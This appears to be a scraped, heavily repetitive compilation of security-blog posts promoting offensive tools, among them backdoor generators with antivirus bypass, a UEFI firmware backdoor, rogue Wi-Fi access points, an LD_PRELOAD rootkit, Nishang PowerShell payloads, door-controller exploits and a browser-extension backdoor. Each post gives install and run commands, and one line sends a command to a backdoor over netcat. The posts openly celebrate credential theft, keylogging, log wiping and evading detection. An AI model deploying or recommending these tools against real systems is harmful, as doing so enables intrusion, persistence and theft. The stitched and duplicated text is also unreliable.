Postex is a Linux post exploitation tool for discovery, backdooring, and lateral movement.

goals
+ run independently of the host environment (no dependence on existing executable utilities, e.g. python, ruby, find)
+ run with minimal liklihood of detection (no execution of potentially detectable commands, e.g. netstat, lsof, who)
+ run fast (parallelized native code)

discovery
+ grab a snapshot of host activity like processes, net connections, arp cache, logged in users, more
+ … do the above over a period of time to get a sense of how the machine is used and by whom
+ detect security controls: A/V & auditd rules
+ grab ssh keys
+ serialize discovery data as JSON for easy consumption later

backdoor
+ modify user’s ssh config to force user to enable connection sharing (ControlMaster) when ssh’ing to remote hosts
features
– add user to the system
– add ssh pubkey to the root user
– execute userspace commands
– extensible…

antiforensics
+ encrypted payload functions
— when the backdoor is at rest (not performing an operation), the interesting pieces of payload are encrypted in memory. This is accomplished by receiving a command -> decryption -> execution -> re-encryption. The control channel supports OTP– each command sent to the backdoor has the option of providing a new key. The need to re-encrypt with a new key goes away when diffie-hellmann is implemented for key exchange.
— this feature isn’t useful for an opensource backdoor….um ok. did I mention extensibility?
+ userspace command execution isn’t picked up by auditd or traditional kprobing
I’m debating whether to write a LiME memory dump modifier to tamper with accurate memory dumps. Maybe too devious.

howtodetect
+ you’ll have a tainted kernel if you “allow signed modules, but don’t require them”
+ all legitimate kernel modules will need to be signed for an unsigned module to be noticed
— you still need to safely get the fact that the kernel is tainted off the system somehow
— the kernel can be tainted for reasons other than unsigned driver loading, so pay attention to the taint code
+ volatility can show you there’s a netfilter hook in place. you probably aren’t expecting any, so this is usually high signal.
— you can then reverse this piece of the module, but shouldn’t be able to analyze the payload without the key
— unless something like diffie-hellmann is used for key exchange, you can capture the key over the network to decrypt payload
+ so it still means you need memory dump & pcap to analyze the payloa

lateral movement
+ piggy back on forwarded ssh credentials (ssh-agent reuse)
+ piggy back on existing ssh connections that have connection sharing enabled (ssh connection reuse)

use and download:

git clone https://github.com/unixist/postex && cd postex
cd discovery
go build
cd cmd
go run snappy.go --av | jq '.[] | select(.Name == "Antivirus")|.Values[].Name'
"OSSEC"
"Sophos"
"Tripwire"
"Samhain"


for Backdoor
cd persistence
make
Add a public key to the root user's /root/.ssh/authorized_keys file.
$ echo 'key:0124812401:1111111111:2' | nc -u $host 8001
and run all ko module

Source: https://github.com/unixist

What is FatRat ??
Easy tool for generate backdoor with msfvenom ( part of metasploit framework ) and program compiles a C program with a meterpreter reverse_tcp payload In it that can then be executed on a windows host Program to create a C program after it is compiled that will bypass most AV.
Automating metasploit functions:
+ Checks for metasploit service and starts if not present
+ Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android and Mac and another
+ Start multiple meterpreter reverse_tcp listners
+ Fast Search in searchsploit
+ Bypass AV
+ Drop into Msfconsole
+ Some other fun stuff

Dependencies:
+ Metasploit Framework
+ MinGW
This Tools/Software has been totally test in Kali Linux 2.0 & Rolling 2016.1

Download & Usage:

git clone https://github.com/Screetsec/TheFatRat.git && cd TheFatRat
chmod +x fatrat
chmod +x powerfull.sh
./fatrat

Source: https://github.com/Screetsec

Changelog v1.2:
* FUD BACKDOOR WITH AVOID 1.2 added.
++ METASPLOIT SHELL A.V. FOR BYPASS AV VERSION 2.1

TheFatRat v1.2

What is FatRat ??
Easy tool for generate backdoor with msfvenom ( part of metasploit framework ) and program compiles a C program with a meterpreter reverse_tcp payload In it that can then be executed on a windows host Program to create a C program after it is compiled that will bypass most AV.
Automating metasploit functions:
+ Checks for metasploit service and starts if not present
+ Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android and Mac and another
+ Start multiple meterpreter reverse_tcp listners
+ Fast Search in searchsploit
+ Bypass AV
+ Drop into Msfconsole
+ Some other fun stuff

Dependencies:
+ Metasploit Framework
+ MinGW
This Tools/Software has been totally test in Kali Linux 2.0 & Rolling 2016.1

Download & Usage:

git clone https://github.com/Screetsec/TheFatRat.git && cd TheFatRat
chmod +x fatrat
chmod +x powerfull.sh
./fatrat

Note From Us:
Before updating using git pull origin master
please remove old fatrat & powerfull.sh : rm -f fatrat | rm -f powerfull.sh
then typing on console:
git pull origin master

Source: https://github.com/Screetsec | Our Post Before

This project implements early stage firmware backdoor for UEFI based firmware. It allows to execute arbitrary code written in C during Pre EFI Init (PEI) phase of Platform Initialization (PI). This backdoor might be useful for low level manipulations with the target platform configuration when the most of the platform configuration registers are not locked yet.

PEI backdoor project includes:
+ PeiBackdoor.py – Python program that allows to infect raw flash images or individual UEFI PEI drivers with the backdoor code.
+ PeiBackdoor_IA32.efi, PeiBackdoor_IA32.pdb – 32-bit PEI backdoor binary compiled with ACTIVE_PLATFORM = IA32.
+ PeiBackdoor_X64.efi, PeiBackdoor_X64.pdb – 64-bit PEI backdoor binary compiled with ACTIVE_PLATFORM = X64.
+ PeiBackdoor.inf – PEI backdoor project configuration for EDK2 build environment.
+ config.h – PEI backdoor build options.
+ payload.c – Put your own PEI stage code into this source file and call it from Payload() function.
+ src/ – Rest of the PEI backdoor code.
PeiBackdoor.py is using Capstone engine and pefile Python libraries, you need to install them with pip install capstone pefile command.

PeiBackdoor .py program to deploy PEI backdoor

Possible applied use cases:
* Edit values of REMAPBASE, REMAPLIMIT and other host controller registers during RAM initialization to perform UMA remap attack on Intel Management Engine RAM.
* Lock TSEGMB host controller register with the junk value to make System Management Mode code vulnerable to DMA attacks.
* Do other evil things that requires hijacking of early stage platform initialization code.

To build PeiBackdoor project you need to have a Windows machine with Visual Studio 2008 and EDK2 https://github.com/tianocore/edk2 source code.
Step by step instruction:
1. Run Visual Studio 2008 Command Prompt and cd to EDK2 directory.
2. Execute Edk2Setup.bat –pull command to configure build environment and download required binaries.
3. Execute git clone git://github.com/Cr4sh/PeiBackdoor.git command.
4. Edit Conf/target.txt file and set ACTIVE_PLATFORM property value to the OvmfPkg/OvmfPkgX64.dsc for 64-bit build or to the OvmfPkg/OvmfPkgIa32.dsc for 32-bit build. Also you need to set TARGET_ARCH property value to the X64 for 64-bit build or to the IA32 for 32-bit build.
5. Edit OvmfPkg/OvmfPkgX64.dsc and add PeiBackdoor/PeiBackdoor.inf path at the end of the [components] section.
6. cd PeiBackdoor && build
7. After compilation resulting PE image file will be created at Build/OvmfX64/DEBUG_VS2008x86/X64/PeiBackdoor/PeiBackdoor/OUTPUT/PeiBackdoor.efi for 64-bit build or at Build/OvmfX64/DEBUG_VS2008x86/IA32/PeiBackdoor/PeiBackdoor/OUTPUT/PeiBackdoor.efi for 32-bit build.

Running on real hardware
To run PeiBackdoor.efi on your physical machine you need to obtain image of existing PEI driver:
1. Dump motherboard firmware using hardware SPI programmer.
2. Open dumped flash image in UEFITool and extract PE/TE image of existing PEI driver that you want to infect with PEI backdoor:

pei-replace

..and itfect it using PeiBackdoor.py:
1. Infect extracted PE or TE image with SmmBackdoor_IA32.efi or SmmBackdoor_X64.efi depending on it’s architecture: python PeiBackdoor.py -d image.efi -o image_patched.efi -p PeiBackdoor_X64.efi
2.Use UEFITool to replace original PE image with image_patched.efi, save modified flash image into the file and write it to the motherboard ROM with programmer.
Usage and Download from git:

git clone https://github.com/Cr4sh/PeiBackdoor && cd PeiBackdoor
python PeiBackdoor.py -f flash.bin -p PeiBackdoor_IA32.efi -o flash_patched.bin

Source: http://blog.cr4.sh/ | https://github.com/Cr4sh

Changelog the Fatrat v1.5:
– Add PE file for example
– Add featrues embed backdoor with backdoor-factory
– Recoded function cmsfvenom
– Add some Variables ( pwd , Version ,Codename )
– Added script function gboor ( checked if your command is correct)
– Added script function spinner for randoom seed generator from avoid
– Added script function spinner metasploit generator from avoid
– Added autorun script when create listener
– Remove cd “output”
– Change the script ouput when msfvenom create
– Change name ( optional ) ouput when you create backdoor
– Added script for Cleanning

TheFatRat v1.5

What is FatRat ??
Easy tool for generate backdoor with msfvenom ( part of metasploit framework ) and program compiles a C program with a meterpreter reverse_tcp payload In it that can then be executed on a windows host Program to create a C program after it is compiled that will bypass most AV.
Automating metasploit functions:
+ Checks for metasploit service and starts if not present
+ Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android and Mac and another
+ Start multiple meterpreter reverse_tcp listners
+ Fast Search in searchsploit
+ Bypass AV
+ Drop into Msfconsole
+ Some other fun stuff

Dependencies:
+ Metasploit Framework
+ MinGW
This Tools/Software has been totally test in Kali Linux 2.0 & Rolling 2016.1

Download & Usage:

apt-get install mingw32 (install requirement)
git clone https://github.com/Screetsec/TheFatRat.git && cd TheFatRat
chmod +x fatrat
chmod +x powerfull.sh
./fatrat

Note From Us:
Before updating using git pull origin master
please remove old fatrat & powerfull.sh : rm -f fatrat | rm -f powerfull.sh
then typing on console:
git pull origin master

Source: https://github.com/Screetsec | Our Post Before

Changelog Wifi-Pumpkin v0.8.1:
——————————————–
– re-design all GUI Menu->view
– added new report logger GUI
– added new sessions for Rogue AP loggers
– added new plugin BDFProxy-ng
– added new theme Orange and set as default
– fixed error when launch airodump-ng scan the wireless networks #75
– fixed IndexError: list index out of range on BDFProxy get_output #77
– added new re-design module Deauth Wireless Attack
– added some improvements in module Probe Wireless Request #78
– added option: exclude USB Wi-Fi Adapter in NetworkManager persistently #69

wifi-pumpkin v0.8.1

Wifi-Pumpkin Updater Click Help Menu then Update

WiFi-Pumpkin is security tool that provide the Rogue access point to Man-In-The-Middle and network attacks. purporting to provide wireless Internet services, but snooping on the traffic. can be used to capture of credentials of unsuspecting users by either snooping the communication by phishing.
Features
+ Rouge Wi-Fi Access Point
+ Deauth Clients AP
+ Probe Request Monitor
+ DHCP Starvation Attack
+ Crendentials Monitor
+ Windows Update Attack
+ Templates phishing
+ Partial bypass HSTS
+ Dump credentials phishing
+ Support airodump scan
+ Support mkd3 deauth
+ beef hook support
+ Report Logs html
+ Mac Changer
+ ARP Posion
+ DNS Spoof

Ubuntu/Kali 2.0/WifiSlax 4.11.1/Parrot 2.0.5:

git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
cd WiFi-Pumpkin
chmod +x installer.sh
./installer.sh --install


Update
cd WiFi-Pumpkin
git pull origin master

then run
wifipumpkin (ubuntu)
wifi-pumpkin (kali 2.0)

Source : https://github.com/P0cL4bs | Download: 0.8.1.zip | 0.8.1.tar.gz | Our post before

Changelog 12.09.16 TomcatWarDeployer Version 0.3.3:
+ Added support for Tomcat 5 interface.

tomcatwardeployer v0.3.3

tomcatWarDeployer v0.3

tomcatWarDeployer is an Apache Tomcat auto WAR deployment & pwning penetration testing tool.
What is it?
This is a penetration testing tool intended to leverage Apache Tomcat credentials in order to automatically generate and deploy JSP Backdoor, as well as invoke it afterwards and provide nice shell (either via web gui, listening port binded on remote machine or as a reverse tcp payload connecting back to the adversary).
In practice, it generates JSP backdoor WAR package on-the-fly and deploys it at the Apache Tomcat Manager Application, using valid HTTP Authentication credentials that pentester provided (or custom ones, in the end, we all love tomcat:tomcat ).

TODO
+ Implement sort of communication authentication and encryption/encoding, to prevent flow of plain-text data through the wire/ether
+ Test it on tomcat8

Usage:

git clone https://github.com/mgeeky/tomcatWarDeployer && cd tomcatWarDeployer
python tomcatWarDeployer.py -h

Update:
git pull origin master

Source: https://github.com/mgeeky | Our Post Before

Notice:
Usage of  tomcatWarDeployer for attacking infrastructures without prior mutual consistency can be considered as an illegal activity. It is the final user’s responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.

Changelog TheFatRat v1.6 codename “Tasty” :
– Add new features create backdoor with PwnWinds ( FUD++ )
– Add some script for checking monodevelop and apache server
– Add new features backdooring original apk with metasploit
– Add setup.sh for configuration fatrat and install dependencies
– remove auto install bdf and mingw ( function checked )
– Add listener for android
– Add feature for cleanup all backdoor

thefatrat v1.6

TheFatRat v1.5

What is FatRat ??
Easy tool for generate backdoor with msfvenom ( part of metasploit framework ) and program compiles a C program with a meterpreter reverse_tcp payload In it that can then be executed on a windows host Program to create a C program after it is compiled that will bypass most AV.
Automating metasploit functions:
+ Checks for metasploit service and starts if not present
+ Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android and Mac and another
+ Start multiple meterpreter reverse_tcp listners
+ Fast Search in searchsploit
+ Bypass AV
+ Drop into Msfconsole
+ Some other fun stuff

Dependencies:
+ Metasploit Framework
+ MinGW
This Tools/Software has been totally test in Kali Linux 2.0 & Rolling 2016.1

Download & Usage:

apt-get install mingw32 (install requirement)
git clone https://github.com/Screetsec/TheFatRat.git && cd TheFatRat
chmod +x fatrat
chmod +x powerfull.sh
./fatrat

Note From Us:
Before updating using git pull origin master
please remove old fatrat & powerfull.sh : rm -f fatrat | rm -f powerfull.sh
then typing on console:
git pull origin master

Source: https://github.com/Screetsec | Our Post Before

Changelog backdoor-apk v0.1.4 (2016-09-20):
Improvements
* New UI enhancements allow selecting Android payloads and entering LHOST and LPORT values
* New ascii art is displayed on script execution
* First attempt at improving the readability of logging output
* Apktool is no longer provided as a third-party tool, backdoor-apk.sh now expects apktool to be properly setup on the system

Miscellaneous
* README and HISTORY file updates

Backdoor-Apk v0.1.4

backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.

backdoor apk v0.1.2

The recompiled APK will be found in the ‘original/dist’ directory. Install the APK on a compatible Android device, run it, and handle the meterpreter connection at the specified IP and port.
Usage:

git clone https://github.com/dana-at-cp/backdoor-apk && cd backdoor-apk
cd backdoor-apk
./backdoor-apk.sh [your apk file]

Update:
git pull origin master

Now you can upload it using MITM technique :-) (Just for education purpose right?yeah.. lets rock)

Source: https://github.com/dana-at-cp | Our Post Before

Concierge is A collection (eventually) of Physical Access Control and Monitoring attacks and utilities. These will all eventually evolve into a more effective and user friendly set of tools, but for now, simple bash scripts will do the job.

Dependencies:
+ All Linux Machine
+ Nmap
+ git

Mainly Script:
* eh400.sh
Usage: ./eh400.sh <action>
Actions: exploit, cleanup
All necessary variables will be entered during execution of the script.
exploit: Leverages command injection vulnerability to:
+ Modify .htpasswd file to a known password value for “admin” user. This allows manual control via http(s).
+ Pushes remote agent script to the EH400 (used by triggeragent.sh). This allows for control via cmdline.
+ Pulls IdentDB badge store and /etc/shadow from EH400.
+ Also checks /etc/shadow for known default password values.
cleanup: Removes all copied or created files and restores the original htpasswd file.

* vertx.sh
Usage: ./vertx.sh <action>
Actions: exploit, cleanup
All necessary variables will be entered during execution of the script.
exploit: Leverages command injection vulnerability to:
+ Creates new user, ‘z’, with password ‘backdoor’, and grants web access privs. This allows manual control via http(s).
+ Pushes remote agent script to the VertX EVO (used by triggeragent.sh). This allows for control via cmdline.
+ Pulls IdentDB badge store and /etc/passwd from VertX EVO.
+ Also checks /etc/passwd for known default password values.
clean up: Removes all copied or created files and deletes the ‘z’ user.

* agentdeploy.sh
Usage: ./agentdeploy.sh <ip> <mac>
This script can be used for both EH400 and VertX EVO door controllers. This is a lighter weight script that only deploys the agent script for use with triggeragent.sh.

* triggeragent.sh
Usage: ./triggeragent.sh <ip> <mac> <action>
Actions: unlock, lock, blink
Example: ./triggeragent.sh 10.1.1.10 00:11:22:33:44:55 unlock
Leverages a previously deployed agent script deployed to lock/unlock a door controller’s associated locking mechanism or blink the LEDs on the associated reader. Further testing against V1000 required.
‘blink’ flashes the LED lights on an associated RFID reader. Used to help locate the exploited door. This has only been tested on HID iClass (and similar) readers, but should work on any reader with external LEDs.

* agentclean.sh
Usage: ./agentclean.sh <ip> <mac>
Removes agent script from targeted door controller. Used to clean up after agentdeploy.sh and triggeragent.sh. If you’ve used eh400.sh or vertx.sh to exploit the targets, use them again with the cleanup action.

* massdeploy.sh

Usage: ./massdeploy.sh <attacker ip> <target(s)> Example: ./massdeploy.sh 10.0.0.1 10.1.1.0/24
All targets must be provided in nmap acceptable format. Currently, input files are not accepted. This script simply automates findings door controllers and deploying agents.

* massclean.sh
Usage: ./massclean.sh <target(s)>
Example: ./massclean.sh 10.10.0.1/24
hid-discoveryd-enum.nse
Usage: nmap -sU -p 4070 –script hid-discoveryd-enum <target(s)>
Simple nmap script to leverage the fuctionality of the discoveryd service to identify HID EVO door controllers and enumerate system information. This nse is located in the tools directory. Simply copy it to nmap’s script directory.

Notes
Testing of these scripts were completed against three seperate HID Door controllers:
+ Edge EVO EH400
+ VertX EVO V2000
+ VertX EVO V1000
A wiki will be on the way shortly enough to provide more thorough information.

Usage and Download:

git clone https://github.com/lixmk/Concierge && Concierge
now you can run one by one thoose bash script

Source: https://github.com/lixmk

Changelog v9/10/2016:
+ Scanner: Automated HTTP Enumeration v0.4 *New
+ Exploit: add freepbx exploit
+ Misc: Breakout Atari 2600 Homebrew (PAL only).

Automated HTTP Enumeration v0.4

Dnsspider : A very fast multithreaded bruteforcer of subdomains that leverages a wordlist and/or character permutation

This section offers a selection of our fully featured security and hacking tools from NullSecurity.
+ Automation :
This section includes automation tools and wrapper scripts for well-known and public security tools to make your life easier. You can adjust the scripts fast and easily according to your own needs. Mostly written in bourne shell.
+ Backdoor :
Backdoors and rootkits for kernel and userland, network, hardware and software. Once you have gone through all the hard work making sure you can get on the system. Make sure you can always get back in.
+ Binary :
ELF and PE binary related tools. This section includes packers, runtime crypters, including our famous (thanks trusted sec team) hyperion tool from our very own belial and other stuff.
+ Cracker :
Tools for cracking network and software login masks. Not been able to find an exploit to give you RCE? Too lazy to SE? So go smash down the front doors and rummage around with our cracking and brute force tools.
+ Cryptography :
Encrypt all the things! With privacy issues moving up most people agenda with items like PRISM in the news cryptography it one of todays hot topics. It’s also pretty useful for exfiltrating data from your target environment, connecting to that C2 box and keeping your loot away from prying eyes.
+ DDoS :
(D)DoS tools if you wanna by like those n00bs at anonymous or simulate everyones favourite underground extortionists.
+ Exploit :
Proof of Concept tools and, if we are feeling particularly generous, fully working exploits because there is nothing more fun that RCE, except dinner with noptrix of course.
+ Fuzzer :
Didn’t find the exploit you wanted in our exploit section well try one of our fuzzers and write you own god damn code.
+ Keylogger :
When you really need to know those credentials you keep seeing the user enter or are too lazy to go searching for every new piece of useful information just try one of our keyloggers and get the user to do the hard work for you!
+ LogCleaner :
Just because our mothers raised us right, we always clean up after ourselves and pwnage is no exception. These logcleaners also help in not getting caught on that important engagement.
+ Misc :
This section includes miscellanous files. Often, you will find non-security related stuff here.
+ Resersing :
Whether figuring out how that new piece of malware you just discovered works or hunting for the next 0day from $vendor, our reversing toolz will help you on your way.
+ Scanner
Can’t find any useful hints on shodan? Google dorks not dishing up the goods? Hell get one of our scanners out and track down your targets in 2 shakes of a lol-cat’s tail.
+ Shellcode
Just because our fuzzer worked or the PoC was fantastic doesn’t mean that running calc is gonna put a smile on your face. If you got RCE try our shellcodes to actually do something useful.
+ Wireless
Why wireless? It works and you don’t have to wear your favorite nullsecurity hoody to hide you face from the camera in reception. Hack all the thingz!

Use and Download:

git clone https://github.com/nullsecuritynet/tools && cd tools
now you can run one by one tools inside the folder

Upgrade:
git pull origin master

Downlaod : Master.zip  | Clone Url
Source : http://nullsecurity.net/ | Our Post Before

Razboynik – разбойник – wants to be the best reverse shell based on PHP backdoor
Why Razboynik ?
Where FurezApi Framework and later FurezExploit (C++ brother) were boring and long to setup and install, Razboynik learnt about those mistakes and fix it. Razboynik is giving you a better interface to handle the server (nothing better than shell). Easier to install, faster to use, better to customize and hot new functionnalities:
+ Encoding all the request (Crypto on the way)
+ Infected requests by GET, POST, Headers or Cookies
+ Logs every result in file
+ Better interface
+ Easy to plug bundle and plugin thanks to modules
+ Proxied tunnel (on the way)

Razboynik

Binary
Binaries for differents platforms (Linux, Windows and soon or later Mac) will be available in the ./bin directory. So if you don’t want to build the application by yourself you can use it.
On Windows launch: ./bin/razboynik.exe On linux (in your terminal): (root directory) ./bin/razboynik

Usage:

git clone https://github.com/EatBytes/razboynik && cd razboynik
Be sure gopath has been set on your system
go get github.com/eatbytes/razboynik/app
go build
./razboynik

Source: https://github.com/EatBytes

Changelog TheFatRat v1.7 ( 5/11/2016 ) Codename Keris:
* add backdoor ( rar files )
* Add backdoor ( doc not macro attack)
* Add new features in optional 1 ( create backdoor with msfvenom )
* Fix any bug

TheFatRat v1.7

thefatrat v1.6

TheFatRat v1.5

What is FatRat ??
Easy tool for generate backdoor with msfvenom ( part of metasploit framework ) and program compiles a C program with a meterpreter reverse_tcp payload In it that can then be executed on a windows host Program to create a C program after it is compiled that will bypass most AV.
Automating metasploit functions:
+ Checks for metasploit service and starts if not present
+ Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android and Mac and another
+ Start multiple meterpreter reverse_tcp listners
+ Fast Search in searchsploit
+ Bypass AV
+ Drop into Msfconsole
+ Some other fun stuff

Dependencies:
+ Metasploit Framework
+ MinGW
This Tools/Software has been totally test in Kali Linux 2.0 & Rolling 2016.1

Download & Usage:

apt-get install mingw32 (install requirement)
git clone https://github.com/Screetsec/TheFatRat.git && cd TheFatRat
cd setup
bash setup.sh
chmod +x fatrat
./fatrat

Note From Us:
Before updating using git pull origin master
please remove old fatrat & powerfull.sh : rm -f fatrat | rm -f powerfull.sh
then typing on console:
git pull origin master

Source: https://github.com/Screetsec | Our Post Before

NOTICE: THIS POST JUST FOR EDUCATION & RESEARCH PURPOSE ONLY! YOU CAN LEARN HOW TO rootkit takes control of the system.
vlany is a LD_PRELOAD rootkit for x86_64, i686 and ARM architectures complete with gid based process hiding, xattr based file hiding, network port hiding, anti-detection, anti-debug, persistent installation, execve commands, PAM (ssh/sftp) backdoor, accept() SSL/plaintext backdoor, easy-to-use installation script, incredibly robust configuration.

vlany installation

Features:
* Process hiding
* User hiding
* Network hiding
* LXC container
* Anti-Debug
* Anti-Forensics
* Persistent (re)installation & Anti-Detection
* Dynamic linker modifications
* Backdoors
*** accept() backdoor (derived from Jynx2)
*** PAM backdoor
**** PAM auth logger
* vlany-exclusive commands

Vlany rootkit library

Latest Change 7/11/2016:
* Update patch_ld.py
* Update config.py

Use and download:

wget https://github.com/mempodippy/vlany/archive/master.tar.gz && tar -xf master.tar.gz
./install.sh

Source: https://github.com/mempodippy

Changelog Nishang v0.7.0:
– Added Invoke-SSIDExfil to the Gather directory.
– Gupt-Backdoor can now receive commands from SSID names on targets having PowerShellv3 and above.
– Added ConverTo-ROT13 to the Utility directory

Nishang v0.7.0

nishang v0.6.9

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and penetration testing. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage.

Nishang v-0.6.2 released: PowerShell for penetration testing and offensive security.

Scripts; Nishang currently contains the following scripts and payloads.
+ Antak – the Webshell
– Antak :Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell

+ Backdoors
– HTTP-Backdoor : A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
– DNS_TXT_Pwnage : A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
– Execute-OnTime : A backdoor which can execute PowerShell scripts at a given time on a target.
– Gupt-Backdoor : A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
– Add-ScrnSaveBackdoor : A backdoor which can use Windows screen saver for remote command and script execution.
– Invoke-ADSBackdoor : A backdoor which can use alternate data streams and Windows Registry to achieve persistence.

+ Client
– Out-CHM : Create infected CHM files which can execute PowerShell commands and scripts.
– Out-Word : Create Word files and infect existing ones to run PowerShell commands and scripts.
– Out-Excel : Create Excel files and infect existing ones to run PowerShell commands and scripts.
– Out-HTA : Create a HTA file which can be deployed on a web server and used in phishing campaigns.
– Out-Java : Create signed JAR files which can be used with applets for script and command execution.
– Out-Shortcut : Create shortcut files capable of executing commands and scripts.
– Out-WebQuery : Create IQY files for phishing credentials and SMB hashes.

+ Escalation
– Enable-DuplicateToken : When SYSTEM privileges are required.
– Remove-Update : Introduce vulnerabilities by removing patches.

+ Execution
– Download-Execute-PS : Download and execute a PowerShell script in memory.
– Download_Execute : Download an executable in text format, convert it to an executable, and execute.
– Execute-Command-MSSQL : Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
– Execute-DNSTXT-Code : Execute shellcode in memory using DNS TXT queries.

+ Gather
– Check-VM : Check for a virtual machine.
– Copy-VSS : Copy the SAM file using Volume Shadow Copy Service.
– Invoke-CredentialsPhish : Trick a user into giving credentials in plain text.
– FireBuster FireListener: A pair of scripts for egress testing
– Get-Information : Get juicy information from a target.
– Get-LSASecret : Get LSA Secret from a target.
– Get-PassHashes : Get password hashes from a target.
– Get-WLAN-Keys: Get WLAN keys in plain text from a target.

+ Keylogger
Log keystrokes from a target.
– Invoke-MimikatzWdigestDowngrade: Dump user passwords in plain on Windows 8.1 and Server 2012
– Get-PassHints : Get password hints of Windows users from a target.

+ Pivot
– reate-MultipleSessions : Check credentials on multiple computers and create PSSessions.
– Run-EXEonRemote Copy and execute an executable on multiple machines.
– Invoke-NetworkRelay Create network relays between computers.

+ Prasadhak
– Prasadhak : Check running hashes of running process against the VirusTotal database.

+ Scan
– Brute-Force : Brute force FTP, Active Directory, MSSQL, and Sharepoint.
– Port-Scan : A handy port scanner

+ Powerpreter
Powerpreter : All the functionality of nishang in a single script module.

+ Shells :
– Invoke-PsGcat: Send commands and scripts to specifed Gmail account to be executed by Invoke-PsGcatAgent
– Invoke-PsGcatAgent: Execute commands and scripts sent by Invoke-PsGcat.
– Invoke-PowerShellTcp: An interactive PowerShell reverse connect or bind shell
– Invoke-PowerShellTcpOneLine : Stripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.
– Invoke-PowerShellUdp : An interactive PowerShell reverse connect or bind shell over UDP
– Invoke-PowerShellUdpOneLine : Stripped down version of Invoke-PowerShellUdp.
– Invoke-PoshRatHttps : Reverse interactive PowerShell over HTTPS.
– Invoke-PoshRatHttp : Reverse interactive PowerShell over HTTP.
– Remove-PoshRat : Clean the system after using Invoke-PoshRatHttps
– Invoke-PowerShellWmi : Interactive PowerShell using WMI.
– Invoke-PowerShellIcmp : An interactive PowerShell reverse shell over ICMP.

+ Utility:
– Add-Exfiltration: Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
– Add-Persistence: Add reboot persistence capability to a script.
– Remove-Persistence: Remote persistence added by the Add-Persistence script.
– Do-Exfiltration: Pipe (|) this to any script to exfiltrate the output.
– Download: Transfer a file to the target.
– Parse_Keys : Parse keys logged by the keylogger.
– Invoke-Encode : Encode and compress a script or string.
– Invoke-Decode : Decode and decompress a script or string from Invoke-Encode.
– Start-CaptureServer : Run a web server which logs Basic authentication and SMB hashes.
— [Base64ToString] [StringToBase64] [ExetoText] [TexttoExe]

Download : Nishang.zip | Our Post Before
Source : http://www.labofapenetrationtester.com/

Changelog WiFi-Pumpkin v0.8.3:
* added new design main tool
* added new column VendorMac in man Table
* added set sorted in all Tablewidget
* added new plugins options and description
* added more options in statusbar main
* fixed allow traffic to/from wlan (iptables)
* added find file in directory cfg for check update
* changed the all directory structure characters to lowercase
* ffixed No such file or directory [logs] #102
* fixed Error nmcli exceptions.OSError #104
* added error messages more explained
* added option to set Hostapd binary path (support hostapd-mana)
* fixed improvements fuctions get_interfaces #109
* added new plugin Responder (LLMNR, NBT-NS and MDNS poisoners)
* fixed Redirect traffic from all domains in dnsspoof module
* removed isc-dhcp-server(dhcpd) from dedependencies (optinal)
* added check if interface wireless support AP/Mode
* added python implements a DHCP Server by psychomario
* fixed installer:install mitmproxy in ubuntu
* added function: get possible errors from hostapd service
* fixed get_file_cfg_Update: get update from github
* fixed DNSServer: closes itself with this error #116

WiFi-Pumpkin v0.8.3

wifi-pumpkin v0.8.1

Wifi-Pumpkin Updater Click Help Menu then Update

WiFi-Pumpkin is security tool that provide the Rogue access point to Man-In-The-Middle and network attacks. purporting to provide wireless Internet services, but snooping on the traffic. can be used to capture of credentials of unsuspecting users by either snooping the communication by phishing.
Features
+ Rouge Wi-Fi Access Point
+ Deauth Clients AP
+ Probe Request Monitor
+ DHCP Starvation Attack
+ Crendentials Monitor
+ Windows Update Attack
+ Templates phishing
+ Partial bypass HSTS
+ Dump credentials phishing
+ Support airodump scan
+ Support mkd3 deauth
+ beef hook support
+ Report Logs html
+ Mac Changer
+ ARP Posion
+ DNS Spoof

Ubuntu/Kali 2.0/WifiSlax 4.11.1/Parrot 2.0.5:

git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
cd WiFi-Pumpkin
chmod +x installer.sh
./installer.sh --install


Update
cd WiFi-Pumpkin
git pull origin master

then run
wifipumpkin (ubuntu)
wifi-pumpkin (kali 2.0)

Source : https://github.com/P0cL4bs | Download: 0.8.3.zip | 0.8.3.tar.gz | Our post before

LEGAL DISCLAMER:
The author does not hold any responsibility about the bad use of this script, remmember that attacking targets without prior concent its ilegal and punish by law, this script was build to show how resource files can automate tasks.

Changelog ChromeBackdoor v3.0:
+ chromebackdoor.py; Error bot – resolved.
+ SQL; SQL in root.

Chromebackdoor is a pentest tool, this tool use a MITB technique for generate a windows executable “.exe” after launch run a malicious extension or script on most popular browsers, and send all DOM datas on command and control.

ChromeBackdoor

Dependencies:
+ pip install crxmake
+ wine32

Usage and Install Dependencies:

pip install crxmake
git clone https://github.com/graniet/chromebackdoor && cd chromebackdoor
python chromebackdoor.py

Upgrade:
git pull

Source: https://github.com/graniet

Changelog backdoor-apk v0.1.7 (2016-11-30):
* Improvements
++ Automatic generation of Metasploit resource script to handle selected payload (credit to John Troony for the suggestion)
* Bug Fixes
++ Fixed persistence hook breakage caused by upstream changes in Metasploit.

backdoor apk v0.1.7

Backdoor-Apk v0.1.4

backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.

backdoor apk v0.1.2

